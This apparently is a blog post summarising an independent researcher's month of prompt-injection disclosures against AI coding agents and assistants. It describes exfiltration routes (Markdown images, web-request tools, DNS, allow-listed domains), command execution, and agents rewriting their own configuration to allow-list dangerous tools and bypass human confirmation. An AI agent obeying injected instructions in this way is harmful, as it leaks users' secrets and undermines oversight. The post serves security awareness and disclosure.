Simon Willison’s Weblog

Subscribe

The Summer of Johann: prompt injections as far as the eye can see

15th August 2025

Independent AI researcher Johann Rehberger (previously) has had an absurdly busy August. Under the heading The Month of AI Bugs he has been publishing one report per day across an array of different tools, all of which are vulnerable to various classic prompt injection problems. This is a fantastic and horrifying demonstration of how widespread and dangerous these vulnerabilities still are, almost three years after we first started talking about them.

Johann’s published research in August so far covers ChatGPT, Codex, Anthropic MCPs, Cursor, Amp, Devin, OpenHands, Claude Code, GitHub Copilot and Google Jules. There’s still half the month left!

Here are my one-sentence summaries of everything he’s published so far:

Common patterns

There are a number of patterns that show up time and time again in the above list of disclosures:

  • Prompt injection. Every single one of these attacks starts with exposing an LLM system to untrusted content. There are so many ways malicious instructions can get into an LLM system—you might send the system to consult a web page or GitHub issue, or paste in a bug report, or feed it automated messages from Slack or Discord. If you can avoid unstrusted instructions entirely you don’t need to worry about this... but I don’t think that’s at all realistic given the way people like to use LLM-powered tools.
  • Exfiltration attacks. As seen in the lethal trifecta, if a model has access to both secret information and exposure to untrusted content you have to be very confident there’s no way for those secrets to be stolen and passed off to an attacker. There are so many ways this can happen:
    • The classic Markdown image attack, as seen in dozens of previous systems.
    • Any tool that can make a web request—a browser tool, or a Bash terminal that can use curl, or a custom view_text_website tool, or anything that can trigger a DNS resolution.
    • Systems that allow-list specific domains need to be very careful about things like *.azure.net which could allow an attacker to host their own logging endpoint on an allow-listed site.
  • Arbitrary command execution—a key feature of most coding agents—is obviously a huge problem the moment a prompt injection attack can be used to trigger those tools.
  • Privilege escalation—several of these exploits involved an allow-listed file write operation being used to modify the settings of the coding agent to add further, more dangerous tools to the allow-listed set.

The AI Kill Chain

Inspired by my description of the lethal trifecta, Johann has coined the term AI Kill Chain to describe a particularly harmful pattern:

  • prompt injection leading to a
  • confused deputy that then enables
  • automatic tool invocation

The automatic piece here is really important: many LLM systems such as Claude Code attempt to prevent against prompt injection attacks by asking humans to confirm every tool action triggered by the LLM... but there are a number of ways this might be subverted, most notably the above attacks that rewrite the agent’s configuration to allow-list future invocations of dangerous tools.

A lot of these vulnerabilities have not been fixed

Each of Johann’s posts includes notes about his responsible disclosure process for the underlying issues. Some of them were fixed, but in an alarming number of cases the problem was reported to the vendor who did not fix it given a 90 or 120 day period.

Johann includes versions of this text in several of the above posts:

To follow industry best-practices for responsible disclosure this vulnerability is now shared publicly to ensure users can take steps to protect themselves and make informed risk decisions.

It looks to me like the ones that were not addressed were mostly cases where the utility of the tool would be quite dramatically impacted by shutting down the described vulnerabilites. Some of these systems are simply insecure as designed.

Back in September 2022 I wrote the following:

The important thing is to take the existence of this class of attack into account when designing these systems. There may be systems that should not be built at all until we have a robust solution.

It looks like we built them anyway!

This is The Summer of Johann: prompt injections as far as the eye can see by Simon Willison, posted on 15th August 2025.

Part of series Prompt injection

  1. Design Patterns for Securing LLM Agents against Prompt Injections - June 13, 2025, 1:26 p.m.
  2. An Introduction to Google’s Approach to AI Agent Security - June 15, 2025, 5:28 a.m.
  3. The lethal trifecta for AI agents: private data, untrusted content, and external communication - June 16, 2025, 1:20 p.m.
  4. The Summer of Johann: prompt injections as far as the eye can see - Aug. 15, 2025, 10:44 p.m.

Previous: Open weight LLMs exhibit inconsistent performance across providers

Monthly briefing

Sponsor me for $10/month and get a curated email digest of the month's most important LLM developments.

Pay me to send you less!

Sponsor & subscribe